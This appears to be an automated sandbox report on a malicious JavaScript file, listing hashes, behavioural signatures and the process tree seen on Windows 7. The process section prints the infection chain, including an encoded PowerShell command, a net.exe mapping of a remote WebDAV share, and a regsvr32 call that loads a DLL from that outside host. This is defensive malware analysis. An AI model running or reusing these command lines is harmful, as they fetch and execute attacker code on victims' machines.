Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
20/08/2024, 14:32
Static task
static1
Behavioral task
behavioral1
Sample
0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4.js
Resource
win10v2004-20240802-en
General
-
Target
0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4.js
-
Size
8KB
-
MD5
f4e7eb825ae54cf12d25350d99837c42
-
SHA1
5d4bf885646cf64ed5fd318c8623ea601f3f7bbd
-
SHA256
0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4
-
SHA512
a203712ba316b0456b83597132427818a07ca5bf007a0d23b84acf6fe8e0f903d1ee242dcd1eba7eec8b6cc9f7343c3fd9f560bf7a9557b513569942bc6a44e9
-
SSDEEP
192:6tOJNkoWcm6H87EiAZt6fgpuJNpPqUuRoXrjCyIzHyI6VBQMkCURFNybthgAmtqZ:6tD7EiAZt6fUuJ3PqUuRoXrjCyIzHyII
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2320 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2320 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2352 wrote to memory of 2320 2352 wscript.exe 31 PID 2352 wrote to memory of 2320 2352 wscript.exe 31 PID 2352 wrote to memory of 2320 2352 wscript.exe 31 PID 2320 wrote to memory of 808 2320 powershell.exe 33 PID 2320 wrote to memory of 808 2320 powershell.exe 33 PID 2320 wrote to memory of 808 2320 powershell.exe 33 PID 2320 wrote to memory of 2400 2320 powershell.exe 34 PID 2320 wrote to memory of 2400 2320 powershell.exe 34 PID 2320 wrote to memory of 2400 2320 powershell.exe 34 PID 2320 wrote to memory of 2400 2320 powershell.exe 34 PID 2320 wrote to memory of 2400 2320 powershell.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4.js1⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADEANgA4ADkAMwA3ADAANgAxADIANwA2ADcAMAAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:808
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\16893706127670.dll3⤵PID:2400
-
-